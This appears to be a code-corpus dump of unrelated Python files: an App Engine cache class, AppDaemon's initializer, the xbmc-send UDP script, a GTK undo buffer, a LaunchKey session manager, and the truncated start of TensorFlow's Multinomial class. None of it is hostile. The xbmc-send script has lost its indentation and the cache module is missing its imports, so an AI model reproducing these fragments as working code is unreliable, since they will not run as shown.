from google.appengine.api import memcache
# settings
DEFAULT_TIMEOUT = 3600 # cache expires after one hour (3600 sec)
CLEAN_CHECK_PERCENT = 50 # percent of requests that trigger a cache cleanup (comment previously said 15%, stale vs. the value)
MAX_HITS_TO_CLEAN = 100 # the maximum number of cache hits to clean on attempt
class _AppEngineUtilities_Cache(db.Model):
    """Datastore entity backing one cache entry (pickled value + expiry)."""
    # It's up to the application to determine the format of their keys
    cachekey = db.StringProperty()
    # set automatically when the entity is first written
    createTime = db.DateTimeProperty(auto_now_add=True)
    # absolute expiry time; entries past this are ignored and cleaned up
    timeout = db.DateTimeProperty()
    # pickled payload
    value = db.BlobProperty()
class Cache(object):
    """
    Cache stores pregenerated output and/or objects in the Big Table
    datastore (mirrored in memcache) to minimize the amount of queries
    needed for page displays. The idea is that complex queries that
    generate the same results really should only be run once. Cache can
    be used to store pregenerated values made from queries (or other
    calls such as urlFetch()), or the query objects themselves.

    Access is dict-like: cache[key] = value, value = cache[key],
    del cache[key], key in cache.
    """

    def __init__(self, clean_check_percent = CLEAN_CHECK_PERCENT,
          max_hits_to_clean = MAX_HITS_TO_CLEAN,
          default_timeout = DEFAULT_TIMEOUT):
        """
        Initializer

        Args:
            clean_check_percent: how often cache initialization should
                run the cache cleanup
            max_hits_to_clean: maximum number of stale hits to clean
            default_timeout: default length (seconds) a cache item is good for
        """
        self.clean_check_percent = clean_check_percent
        self.max_hits_to_clean = max_hits_to_clean
        self.default_timeout = default_timeout
        # Probabilistically garbage-collect expired entries so the
        # datastore does not grow without bound.
        if random.randint(1, 100) < self.clean_check_percent:
            self._clean_cache()
        if 'AEU_Events' in __main__.__dict__:
            __main__.AEU_Events.fire_event('cacheInitialized')

    def _clean_cache(self):
        """
        Find and delete up to max_hits_to_clean expired cache entries,
        keeping the overall datastore size down.
        """
        query = _AppEngineUtilities_Cache.all()
        query.filter('timeout < ', datetime.datetime.now())
        results = query.fetch(self.max_hits_to_clean)
        # batch delete: one RPC instead of one per entity
        db.delete(results)

    def _validate_key(self, key):
        """Raise KeyError if key is None."""
        if key is None:
            raise KeyError

    def _validate_value(self, value):
        """Raise ValueError if value is None (None cannot be cached)."""
        if value is None:
            raise ValueError

    def _validate_timeout(self, timeout):
        """
        Normalize timeout to an absolute datetime.

        Accepts None (use this instance's default_timeout), an int number
        of seconds from now, or an absolute datetime. Raises TypeError for
        other types and ValueError if the result is in the past.
        """
        if timeout is None:
            # Bug fix: previously used the module constant DEFAULT_TIMEOUT,
            # silently ignoring the default_timeout passed to __init__.
            timeout = datetime.datetime.now() + \
                datetime.timedelta(seconds=self.default_timeout)
        if isinstance(timeout, int):
            timeout = datetime.datetime.now() + \
                datetime.timedelta(seconds=timeout)
        if type(timeout) != datetime.datetime:
            raise TypeError
        if timeout < datetime.datetime.now():
            raise ValueError
        return timeout

    def _memcache_seconds(self, timeout):
        """
        Whole seconds from now until the absolute datetime timeout.

        Bug fix: timedelta.seconds alone wraps at one day; include .days
        so entries with long lifetimes get the correct memcache expiry.
        """
        delta = timeout - datetime.datetime.now()
        return delta.days * 86400 + delta.seconds

    def _store(self, cacheEntry, key, value, timeout):
        """Write an entry to the datastore (best effort) and to memcache."""
        cacheEntry.cachekey = key
        cacheEntry.value = pickle.dumps(value)
        cacheEntry.timeout = timeout
        # Failures may happen due to timeouts, the datastore being read
        # only for maintenance, or other applications. However, the cache
        # not being able to write to the datastore should not break the
        # application.
        try:
            cacheEntry.put()
        except Exception:
            pass
        memcache.set('cache-' + key, value, self._memcache_seconds(timeout))

    def add(self, key = None, value = None, timeout = None):
        """
        add adds an entry to the cache, if one does not already exist.
        Raises KeyError if the key is already present (use set() to
        overwrite).
        """
        self._validate_key(key)
        self._validate_value(value)
        timeout = self._validate_timeout(timeout)
        if key in self:
            raise KeyError
        self._store(_AppEngineUtilities_Cache(), key, value, timeout)
        if 'AEU_Events' in __main__.__dict__:
            __main__.AEU_Events.fire_event('cacheAdded')

    def set(self, key = None, value = None, timeout = None):
        """
        set adds an entry to the cache, overwriting an existing value
        if one already exists.
        """
        self._validate_key(key)
        self._validate_value(value)
        timeout = self._validate_timeout(timeout)
        cacheEntry = self._read(key)
        if not cacheEntry:
            cacheEntry = _AppEngineUtilities_Cache()
        self._store(cacheEntry, key, value, timeout)
        if 'AEU_Events' in __main__.__dict__:
            __main__.AEU_Events.fire_event('cacheSet')

    def _read(self, key = None):
        """
        _read returns the live datastore entity for key, or None.

        It is private because it returns a db.Model object and does not
        unpickle the stored value; the special method __getitem__ is the
        preferred access method for cache data.
        """
        query = _AppEngineUtilities_Cache.all()
        query.filter('cachekey', key)
        query.filter('timeout > ', datetime.datetime.now())
        results = query.fetch(1)
        # Bug fix: was "len(results) is 0" -- identity comparison on an int
        if not results:
            return None
        # Bug fix: these events were dead code placed after the return
        # statement and could never fire.
        if 'AEU_Events' in __main__.__dict__:
            __main__.AEU_Events.fire_event('cacheReadFromDatastore')
            __main__.AEU_Events.fire_event('cacheRead')
        return results[0]

    def delete(self, key = None):
        """
        Deletes the cache entry for key from memcache and the datastore.
        Deleting a missing key is a no-op.
        """
        memcache.delete('cache-' + key)
        result = self._read(key)
        if result:
            if 'AEU_Events' in __main__.__dict__:
                __main__.AEU_Events.fire_event('cacheDeleted')
            result.delete()

    def get(self, key):
        """
        get returns the cache value associated with the key passed;
        raises KeyError if the entry is missing or expired. Checks
        memcache first, then falls back to the datastore (repopulating
        memcache on a hit).
        """
        mc = memcache.get('cache-' + key)
        if mc:
            # NOTE(review): falsy cached values (0, '', False, []) fail
            # this truthiness test and always fall through to the
            # datastore -- confirm whether that is intended.
            if 'AEU_Events' in __main__.__dict__:
                __main__.AEU_Events.fire_event('cacheReadFromMemcache')
                __main__.AEU_Events.fire_event('cacheRead')
            return mc
        result = self._read(key)
        if result:
            value = pickle.loads(result.value)
            # refresh memcache for the entry's remaining lifetime
            # (previously unpickled twice; hoisted into one call)
            memcache.set('cache-' + key, value,
                         self._memcache_seconds(result.timeout))
            return value
        raise KeyError

    def get_many(self, keys):
        """
        Returns a dict mapping each key in keys to its value. If a given
        key is missing, it will be missing from the response dict.
        """
        # Bug fix: previously assigned the undefined name 'val' (NameError
        # on every hit) and let get()'s KeyError escape on every miss,
        # contradicting this docstring.
        values = {}
        for key in keys:
            try:
                values[key] = self.get(key)
            except KeyError:
                pass
        return values

    def __getitem__(self, key):
        """
        __getitem__ is necessary for this object to emulate a container.
        """
        return self.get(key)

    def __setitem__(self, key, value):
        """
        __setitem__ is necessary for this object to emulate a container.
        """
        return self.set(key, value)

    def __delitem__(self, key):
        """
        Implement the 'del' keyword
        """
        return self.delete(key)

    def __contains__(self, key):
        """
        Implements the "in" operator
        """
        try:
            self.__getitem__(key)
        except KeyError:
            return False
        return True

    def has_key(self, keyname):
        """
        Equivalent to 'keyname in cache'; use that form in new code
        """
        return self.__contains__(keyname)
| apache-2.0 |
acockburn/appdaemon | appdaemon/appdaemon.py | 2 | 8426 | import os
import os.path
import concurrent.futures
import threading
class AppDaemon:
    """Top-level AppDaemon runtime object.

    Wires together every subsystem (services, sequences, scheduler, state,
    events, callbacks, futures, app management, threading, plugins) and
    schedules the long-running loops on the supplied asyncio event loop.
    Construction order below is significant: later subsystems reference
    attributes set by earlier ones.
    """
    def __init__(self, logging, loop, **kwargs):
        """Build the runtime from keyword configuration.

        Args:
            logging: AppDaemon logging subsystem; this instance registers
                itself back onto it via register_ad().
            loop: asyncio event loop used to create the internal tasks.
            **kwargs: raw configuration dict; individual options are
                copied onto attributes via utils.process_arg (which
                overrides the default only when the key is present).
        """
        #
        # Import various AppDaemon bits and pieces now to avoid circular import
        #
        import appdaemon.utils as utils
        import appdaemon.thread_async as appq
        import appdaemon.utility_loop as utility
        import appdaemon.plugin_management as plugins
        import appdaemon.threading
        import appdaemon.app_management as apps
        import appdaemon.callbacks as callbacks
        import appdaemon.futures as futures
        import appdaemon.state as state
        import appdaemon.events as events
        import appdaemon.services as services
        import appdaemon.sequences as sequences
        import appdaemon.scheduler as scheduler
        self.logging = logging
        self.logging.register_ad(self)
        self.logger = logging.get_logger()
        # Subsystem handles; populated further down once their
        # dependencies exist.
        self.threading = None
        self.callbacks = None
        self.futures = None
        self.state = None
        self.config = kwargs
        self.booted = "booting"
        self.config["ad_version"] = utils.__version__
        self.check_app_updates_profile = ""
        self.was_dst = False
        self.last_state = None
        self.executor = None
        self.loop = None
        self.srv = None
        self.appd = None
        self.stopping = False
        self.http = None
        self.admin_loop = None
        # Shared state accessible to all apps, guarded by global_lock.
        self.global_vars = {}
        self.global_lock = threading.RLock()
        self.config_file_modified = 0
        self.sched = None
        self.thread_async = None
        self.utility = None
        self.module_debug = kwargs["module_debug"]
        # User Supplied/Defaults
        # NOTE(review): "roundrobbin" looks like a typo for "roundrobin",
        # but the literal may be compared elsewhere -- confirm before fixing.
        self.load_distribution = "roundrobbin"
        utils.process_arg(self, "load_distribution", kwargs)
        self.app_dir = None
        utils.process_arg(self, "app_dir", kwargs)
        self.starttime = None
        utils.process_arg(self, "starttime", kwargs)
        self.latitude = None
        utils.process_arg(self, "latitude", kwargs, float=True)
        self.longitude = None
        utils.process_arg(self, "longitude", kwargs, float=True)
        self.elevation = None
        utils.process_arg(self, "elevation", kwargs, int=True)
        self.time_zone = None
        utils.process_arg(self, "time_zone", kwargs)
        self.tz = None
        self.loop = loop
        self.logfile = None
        self.errfile = None
        self.config_file = None
        utils.process_arg(self, "config_file", kwargs)
        self.config_dir = None
        utils.process_arg(self, "config_dir", kwargs)
        self.timewarp = 1
        utils.process_arg(self, "timewarp", kwargs, float=True)
        self.max_clock_skew = 1
        utils.process_arg(self, "max_clock_skew", kwargs, int=True)
        self.thread_duration_warning_threshold = 10
        utils.process_arg(self, "thread_duration_warning_threshold", kwargs, float=True)
        self.threadpool_workers = 10
        utils.process_arg(self, "threadpool_workers", kwargs, int=True)
        self.endtime = None
        utils.process_arg(self, "endtime", kwargs)
        self.loglevel = "INFO"
        utils.process_arg(self, "loglevel", kwargs)
        self.api_port = None
        utils.process_arg(self, "api_port", kwargs)
        self.utility_delay = 1
        utils.process_arg(self, "utility_delay", kwargs, int=True)
        self.admin_delay = 1
        utils.process_arg(self, "admin_delay", kwargs, int=True)
        # Default skew tolerance derives from the (possibly overridden)
        # utility_delay set just above.
        self.max_utility_skew = self.utility_delay * 2
        utils.process_arg(self, "max_utility_skew", kwargs, float=True)
        self.check_app_updates_profile = False
        utils.process_arg(self, "check_app_updates_profile", kwargs)
        self.production_mode = False
        utils.process_arg(self, "production_mode", kwargs)
        self.invalid_yaml_warnings = True
        utils.process_arg(self, "invalid_yaml_warnings", kwargs)
        self.missing_app_warnings = True
        utils.process_arg(self, "missing_app_warnings", kwargs)
        self.log_thread_actions = False
        utils.process_arg(self, "log_thread_actions", kwargs)
        self.qsize_warning_threshold = 50
        utils.process_arg(self, "qsize_warning_threshold", kwargs, int=True)
        self.qsize_warning_step = 60
        utils.process_arg(self, "qsize_warning_step", kwargs, int=True)
        self.qsize_warning_iterations = 10
        utils.process_arg(self, "qsize_warning_iterations", kwargs, int=True)
        self.internal_function_timeout = 10
        utils.process_arg(self, "internal_function_timeout", kwargs, int=True)
        self.namespaces = {}
        utils.process_arg(self, "namespaces", kwargs)
        self.exclude_dirs = ["__pycache__"]
        if "exclude_dirs" in kwargs:
            self.exclude_dirs += kwargs["exclude_dirs"]
        self.stop_function = None
        utils.process_arg(self, "stop_function", kwargs)
        if not kwargs.get("cert_verify", True):
            self.certpath = False
        if kwargs.get("disable_apps") is True:
            self.apps = False
            self.logging.log("INFO", "Apps are disabled")
        else:
            self.apps = True
        #
        # Set up services
        #
        self.services = services.Services(self)
        #
        # Set up sequences
        #
        self.sequences = sequences.Sequences(self)
        #
        # Set up scheduler
        #
        self.sched = scheduler.Scheduler(self)
        #
        # Set up state
        #
        self.state = state.State(self)
        #
        # Set up events
        #
        self.events = events.Events(self)
        #
        # Set up callbacks
        #
        self.callbacks = callbacks.Callbacks(self)
        #
        # Set up futures
        #
        self.futures = futures.Futures(self)
        if self.apps is True:
            # Resolve app/config directories when not supplied explicitly.
            if self.app_dir is None:
                if self.config_dir is None:
                    self.app_dir = utils.find_path("apps")
                    self.config_dir = os.path.dirname(self.app_dir)
                else:
                    self.app_dir = os.path.join(self.config_dir, "apps")
            utils.check_path("config_dir", self.logger, self.config_dir, permissions="rwx")
            utils.check_path("appdir", self.logger, self.app_dir)
            # Initialize Apps
            self.app_management = apps.AppManagement(self, kwargs.get("app_config_file", None))
        # threading setup
        self.threading = appdaemon.threading.Threading(self, kwargs)
        self.stopping = False
        #
        # Set up Executor ThreadPool
        #
        if "threadpool_workers" in kwargs:
            self.threadpool_workers = int(kwargs["threadpool_workers"])
        self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=self.threadpool_workers)
        # Initialize Plugins
        if "plugins" in kwargs:
            args = kwargs["plugins"]
        else:
            args = None
        self.plugins = plugins.Plugins(self, args)
        # Create thread_async Loop
        self.logger.debug("Starting thread_async loop")
        if self.apps is True:
            self.thread_async = appq.ThreadAsync(self)
            loop.create_task(self.thread_async.loop())
        # Create utility loop
        self.logger.debug("Starting utility loop")
        self.utility = utility.Utility(self)
        loop.create_task(self.utility.loop())
    def stop(self):
        """Signal every running subsystem to stop (shutdown path)."""
        self.stopping = True
        if self.admin_loop is not None:
            self.admin_loop.stop()
        if self.thread_async is not None:
            self.thread_async.stop()
        if self.sched is not None:
            self.sched.stop()
        if self.utility is not None:
            self.utility.stop()
        if self.plugins is not None:
            self.plugins.stop()
    def terminate(self):
        """Final cleanup after stop(); currently tears down state only."""
        if self.state is not None:
            self.state.terminate()
    #
    # Utilities
    #
    def register_http(self, http):
        """Attach the HTTP subsystem and start the admin loop task.

        Args:
            http: HTTP subsystem instance; its .admin attribute decides
                whether the admin loop is created.
        """
        import appdaemon.admin_loop as admin_loop
        self.http = http
        # Create admin loop
        if http.admin is not None:
            self.logger.debug("Starting admin loop")
            self.admin_loop = admin_loop.AdminLoop(self)
            self.loop.create_task(self.admin_loop.loop())
| mit |
tkalpakidis/xbmc | tools/EventClients/Clients/XBMC Send/xbmc-send.py | 49 | 2518 | #!/usr/bin/python
#
# XBMC Media Center
# XBMC Send
# Copyright (c) 2009 team-xbmc
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import sys
import getopt
from socket import *
try:
from xbmc.xbmcclient import *
except:
sys.path.append('../../lib/python')
from xbmcclient import *
def usage():
print "xbmc-send [OPTION] --action=ACTION"
print 'Example'
print '\txbmc-send --host=192.168.0.1 --port=9777 --action="XBMC.Quit"'
print "Options"
print "\t-?, --help\t\t\tWill bring up this message"
print "\t--host=HOST\t\t\tChoose what HOST to connect to (default=localhost)"
print "\t--port=PORT\t\t\tChoose what PORT to connect to (default=9777)"
print '\t--action=ACTION\t\t\tSends an action to XBMC, this option can be added multiple times to create a macro'
pass
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "?pa:v", ["help", "host=", "port=", "action="])
except getopt.GetoptError, err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
ip = "localhost"
port = 9777
actions = []
verbose = False
for o, a in opts:
if o in ("-?", "--help"):
usage()
sys.exit()
elif o == "--host":
ip = a
elif o == "--port":
port = int(a)
elif o in ("-a", "--action"):
actions.append(a)
else:
assert False, "unhandled option"
addr = (ip, port)
sock = socket(AF_INET,SOCK_DGRAM)
if len(actions) is 0:
usage()
sys.exit(0)
for action in actions:
print 'Sending action:', action
packet = PacketACTION(actionmessage=action, actiontype=ACTION_BUTTON)
packet.send(sock, addr)
# Entry point when executed as a script.
if __name__=="__main__":
    main()
| gpl-2.0 |
aurule/HiToDo | undobuffer.py | 1 | 9086 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
""" gtk textbuffer with undo functionality """
# Copyright (C) 2009 Florian Heinle
# Some modifications by Peter Andrews, 2012 and 2013
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import Gtk
class UndoableInsert(object):
    """A single recorded text insertion, as stored on the undo stack."""
    def __init__(self, text_iter, text, length):
        # Remember where and what was inserted so undo can delete it again.
        self.offset = text_iter.get_offset()
        self.text = text
        self.length = length
        # Multi-character inserts and whitespace/newlines start a fresh
        # undo group and are never merged with their neighbours.
        self.mergeable = not (length > 1 or text in ("\r", "\n", " "))
class UndoableDelete(object):
    """A single recorded text deletion, as stored on the undo stack."""
    def __init__(self, text_buffer, start_iter, end_iter):
        # Capture the removed span so undo can re-insert it.
        self.text = text_buffer.get_text(start_iter, end_iter, True)
        self.start = start_iter.get_offset()
        self.end = end_iter.get_offset()
        # Distinguish the Delete key from Backspace by where the cursor
        # sits relative to the deleted span; redo needs to replay the
        # deletion the same way.
        insert_iter = text_buffer.get_iter_at_mark(text_buffer.get_insert())
        self.delete_key_used = insert_iter.get_offset() <= self.start
        # Only single-character, non-whitespace deletions may be merged
        # with a neighbouring deletion.
        self.mergeable = not (self.end - self.start > 1
                              or self.text in ("\r", "\n", " "))
class UndoableTextBuffer(Gtk.TextBuffer):
    """text buffer with added undo capabilities
    designed as a drop-in replacement for gtksourceview,
    at least as far as undo is concerned"""
    def __init__(self):
        """
        we'll need empty stacks for undo/redo and some state keeping
        """
        Gtk.TextBuffer.__init__(self)
        # Undone actions move to redo_stack; a fresh user edit clears it.
        self.undo_stack = []
        self.redo_stack = []
        # When True, the signal handlers record nothing (bulk loads etc.).
        self.not_undoable_action = False
        # When True, an undo/redo is replaying an edit; keep redo_stack.
        self.undo_in_progress = False
        self.connect('insert-text', self.on_insert_text)
        self.connect('delete-range', self.on_delete_range)
    @property
    def can_undo(self):
        # True when there is at least one recorded action to undo.
        return bool(self.undo_stack)
    @property
    def can_redo(self):
        # True when there is at least one undone action to redo.
        return bool(self.redo_stack)
    def clear_undo(self):
        '''Void undo/redo buffers.'''
        self.undo_stack[:] = []
        self.redo_stack[:] = []
    def on_insert_text(self, textbuffer, text_iter, text, length):
        # 'insert-text' signal handler: records the insert, merging
        # consecutive single-character inserts into word-sized actions.
        def can_be_merged(prev, cur):
            """see if we can merge multiple inserts here
            will try to merge words or whitespace
            can't merge if prev and cur are not mergeable in the first place
            can't merge when user set the input bar somewhere else
            can't merge across word boundaries"""
            WHITESPACE = (' ', '\t')
            if not cur.mergeable or not prev.mergeable:
                return False
            elif cur.offset != (prev.offset + prev.length):
                return False
            elif cur.text in WHITESPACE and not prev.text in WHITESPACE:
                return False
            elif prev.text in WHITESPACE and not cur.text in WHITESPACE:
                return False
            return True
        if not self.undo_in_progress:
            # a fresh user edit invalidates the redo history
            self.redo_stack = []
        if self.not_undoable_action:
            return
        undo_action = UndoableInsert(text_iter, text, length)
        try:
            prev_insert = self.undo_stack.pop()
        except IndexError:
            # first action ever recorded
            self.undo_stack.append(undo_action)
            return
        if not isinstance(prev_insert, UndoableInsert):
            self.undo_stack.append(prev_insert)
            self.undo_stack.append(undo_action)
            return
        if can_be_merged(prev_insert, undo_action):
            # grow the previous insert instead of pushing a new action
            prev_insert.length += undo_action.length
            prev_insert.text += undo_action.text
            self.undo_stack.append(prev_insert)
        else:
            self.undo_stack.append(prev_insert)
            self.undo_stack.append(undo_action)
    def on_delete_range(self, text_buffer, start_iter, end_iter):
        # 'delete-range' signal handler: records the deletion, merging
        # consecutive single-character deletions made with the same key.
        def can_be_merged(prev, cur):
            """see if we can merge multiple deletions here
            will try to merge words or whitespace
            can't merge if prev and cur are not mergeable in the first place
            can't merge if delete and backspace key were both used
            can't merge across word boundaries"""
            WHITESPACE = (' ', '\t')
            if not cur.mergeable or not prev.mergeable:
                return False
            elif prev.delete_key_used != cur.delete_key_used:
                return False
            elif prev.start != cur.start and prev.start != cur.end:
                return False
            elif cur.text not in WHITESPACE and \
               prev.text in WHITESPACE:
                return False
            elif cur.text in WHITESPACE and \
               prev.text not in WHITESPACE:
                return False
            return True
        if not self.undo_in_progress:
            # a fresh user edit invalidates the redo history
            self.redo_stack = []
        if self.not_undoable_action:
            return
        undo_action = UndoableDelete(text_buffer, start_iter, end_iter)
        try:
            prev_delete = self.undo_stack.pop()
        except IndexError:
            self.undo_stack.append(undo_action)
            return
        if not isinstance(prev_delete, UndoableDelete):
            self.undo_stack.append(prev_delete)
            self.undo_stack.append(undo_action)
            return
        if can_be_merged(prev_delete, undo_action):
            if prev_delete.start == undo_action.start: # delete key used
                prev_delete.text += undo_action.text
                prev_delete.end += (undo_action.end - undo_action.start)
            else: # Backspace used
                prev_delete.text = "%s%s" % (undo_action.text,
                                             prev_delete.text)
                prev_delete.start = undo_action.start
            self.undo_stack.append(prev_delete)
        else:
            self.undo_stack.append(prev_delete)
            self.undo_stack.append(undo_action)
    def begin_not_undoable_action(self):
        """don't record the next actions
        toggles self.not_undoable_action"""
        self.not_undoable_action = True
    def end_not_undoable_action(self):
        """record next actions
        toggles self.not_undoable_action"""
        self.not_undoable_action = False
    def undo(self):
        """undo inserts or deletions
        undone actions are being moved to redo stack"""
        if not self.undo_stack:
            return
        # the replayed edit must not itself be recorded as a new action
        self.begin_not_undoable_action()
        self.undo_in_progress = True
        undo_action = self.undo_stack.pop()
        self.redo_stack.append(undo_action)
        if isinstance(undo_action, UndoableInsert):
            # undoing an insert means deleting the inserted span
            start = self.get_iter_at_offset(undo_action.offset)
            stop = self.get_iter_at_offset(
                undo_action.offset + undo_action.length
            )
            self.delete(start, stop)
            self.place_cursor(start)
        else:
            # undoing a delete means re-inserting the removed text;
            # cursor placement mirrors which key made the deletion
            start = self.get_iter_at_offset(undo_action.start)
            self.insert(start, undo_action.text)
            stop = self.get_iter_at_offset(undo_action.end)
            if undo_action.delete_key_used:
                self.place_cursor(start)
            else:
                self.place_cursor(stop)
        self.end_not_undoable_action()
        self.undo_in_progress = False
    def redo(self):
        """redo inserts or deletions
        redone actions are moved to undo stack"""
        if not self.redo_stack:
            return
        self.begin_not_undoable_action()
        self.undo_in_progress = True
        redo_action = self.redo_stack.pop()
        self.undo_stack.append(redo_action)
        if isinstance(redo_action, UndoableInsert):
            # redoing an insert re-applies the original insertion
            start = self.get_iter_at_offset(redo_action.offset)
            self.insert(start, redo_action.text)
            new_cursor_pos = self.get_iter_at_offset(
                redo_action.offset + redo_action.length
            )
            self.place_cursor(new_cursor_pos)
        else:
            # redoing a delete removes the span again
            start = self.get_iter_at_offset(redo_action.start)
            stop = self.get_iter_at_offset(redo_action.end)
            self.delete(start, stop)
            self.place_cursor(start)
        self.end_not_undoable_action()
        self.undo_in_progress = False
| gpl-3.0 |
LaunchKey/launchkey-python | features/steps/managers/directory_session.py | 2 | 1321 | from .base import BaseManager
class SessionListNotRetrieved(Exception):
    """Raised when the current session list is accessed before any list has been retrieved."""
class DirectorySessionManager(BaseManager):
    """Manages service sessions for Directory users, remembering both the
    most recently retrieved session list and the one before it.
    """

    def __init__(self, organization_factory):
        # Assigning through the property setter also initializes
        # previous_session_list.
        self.current_session_list = None
        self.previous_session_list = None
        # Bug fix: removed a stray trailing comma in the super() call
        # ("super(DirectorySessionManager, self, )").
        super(DirectorySessionManager, self).__init__(organization_factory)

    @property
    def current_session_list(self):
        """The most recently retrieved session list.

        Raises SessionListNotRetrieved if no list has been retrieved yet.
        """
        if self._current_session_list is None:
            raise SessionListNotRetrieved
        return self._current_session_list

    @current_session_list.setter
    def current_session_list(self, value):
        # Keep the prior value around so callers can compare successive
        # retrievals; getattr guards the very first assignment.
        self.previous_session_list = getattr(
            self, "_current_session_list", None)
        self._current_session_list = value

    def retrieve_session_list_for_user(self, user_identifier, directory_id):
        """Fetch, store, and return all service sessions for the user."""
        directory_client = self._get_directory_client(directory_id)
        self.current_session_list = directory_client.get_all_service_sessions(
            user_identifier
        )
        return self.current_session_list

    def end_all_sessions_for_user(self, user_identifier, directory_id):
        """End every service session belonging to the user."""
        directory_client = self._get_directory_client(directory_id)
        directory_client.end_all_service_sessions(
            user_identifier
        )
| mit |
snnn/tensorflow | tensorflow/python/ops/distributions/multinomial.py | 6 | 11806 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Multinomial distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import util as distribution_util
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"Multinomial",
]
_multinomial_sample_note = """For each batch of counts, `value = [n_0, ...
,n_{k-1}]`, `P[value]` is the probability that after sampling `self.total_count`
draws from this Multinomial distribution, the number of draws falling in class
`j` is `n_j`. Since this definition is [exchangeable](
https://en.wikipedia.org/wiki/Exchangeable_random_variables); different
sequences have the same counts so the probability includes a combinatorial
coefficient.
Note: `value` must be a non-negative tensor with dtype `self.dtype`, have no
fractional components, and such that
`tf.reduce_sum(value, -1) = self.total_count`. Its shape must be broadcastable
with `self.probs` and `self.total_count`."""
@tf_export("distributions.Multinomial")
class Multinomial(distribution.Distribution):
"""Multinomial distribution.
This Multinomial distribution is parameterized by `probs`, a (batch of)
length-`K` `prob` (probability) vectors (`K > 1`) such that
`tf.reduce_sum(probs, -1) = 1`, and a `total_count` number of trials, i.e.,
the number of trials per draw from the Multinomial. It is defined over a
(batch of) length-`K` vector `counts` such that
`tf.reduce_sum(counts, -1) = total_count`. The Multinomial is identically the
Binomial distribution when `K = 2`.
#### Mathematical Details
The Multinomial is a distribution over `K`-class counts, i.e., a length-`K`
vector of non-negative integer `counts = n = [n_0, ..., n_{K-1}]`.
The probability mass function (pmf) is,
```none
pmf(n; pi, N) = prod_j (pi_j)**n_j / Z
Z = (prod_j n_j!) / N!
```
where:
* `probs = pi = [pi_0, ..., pi_{K-1}]`, `pi_j > 0`, `sum_j pi_j = 1`,
* `total_count = N`, `N` a positive integer,
* `Z` is the normalization constant, and,
* `N!` denotes `N` factorial.
Distribution parameters are automatically broadcast in all functions; see
examples for details.
#### Pitfalls
The number of classes, `K`, must not exceed:
- the largest integer representable by `self.dtype`, i.e.,
`2**(mantissa_bits+1)` (IEE754),
- the maximum `Tensor` index, i.e., `2**31-1`.
In other words,
```python
K <= min(2**31-1, {
tf.float16: 2**11,
tf.float32: 2**24,
tf.float64: 2**53 }[param.dtype])
```
Note: This condition is validated only when `self.validate_args = True`.
#### Examples
Create a 3-class distribution, with the 3rd class is most likely to be drawn,
using logits.
```python
logits = [-50., -43, 0]
dist = Multinomial(total_count=4., logits=logits)
```
Create a 3-class distribution, with the 3rd class is most likely to be drawn.
```python
p = [.2, .3, .5]
dist = Multinomial(total_count=4., probs=p)
```
The distribution functions can be evaluated on counts.
```python
# counts same shape as p.
counts = [1., 0, 3]
dist.prob(counts) # Shape []
# p will be broadcast to [[.2, .3, .5], [.2, .3, .5]] to match counts.
counts = [[1., 2, 1], [2, 2, 0]]
dist.prob(counts) # Shape [2]
# p will be broadcast to shape [5, 7, 3] to match counts.
counts = [[...]] # Shape [5, 7, 3]
dist.prob(counts) # Shape [5, 7]
```
Create a 2-batch of 3-class distributions.
```python
p = [[.1, .2, .7], [.3, .3, .4]] # Shape [2, 3]
dist = Multinomial(total_count=[4., 5], probs=p)
counts = [[2., 1, 1], [3, 1, 1]]
dist.prob(counts) # Shape [2]
dist.sample(5) # Shape [5, 2, 3]
```
"""
@deprecation.deprecated(
"2019-01-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.distributions`.",
warn_once=True)
def __init__(self,
total_count,
logits=None,
probs=None,
validate_args=False,
allow_nan_stats=True,
name="Multinomial"):
"""Initialize a batch of Multinomial distributions.
Args:
total_count: Non-negative floating point tensor with shape broadcastable
to `[N1,..., Nm]` with `m >= 0`. Defines this as a batch of
`N1 x ... x Nm` different Multinomial distributions. Its components
should be equal to integer values.
logits: Floating point tensor representing unnormalized log-probabilities
of a positive event with shape broadcastable to
`[N1,..., Nm, K]` `m >= 0`, and the same dtype as `total_count`. Defines
this as a batch of `N1 x ... x Nm` different `K` class Multinomial
distributions. Only one of `logits` or `probs` should be passed in.
probs: Positive floating point tensor with shape broadcastable to
`[N1,..., Nm, K]` `m >= 0` and same dtype as `total_count`. Defines
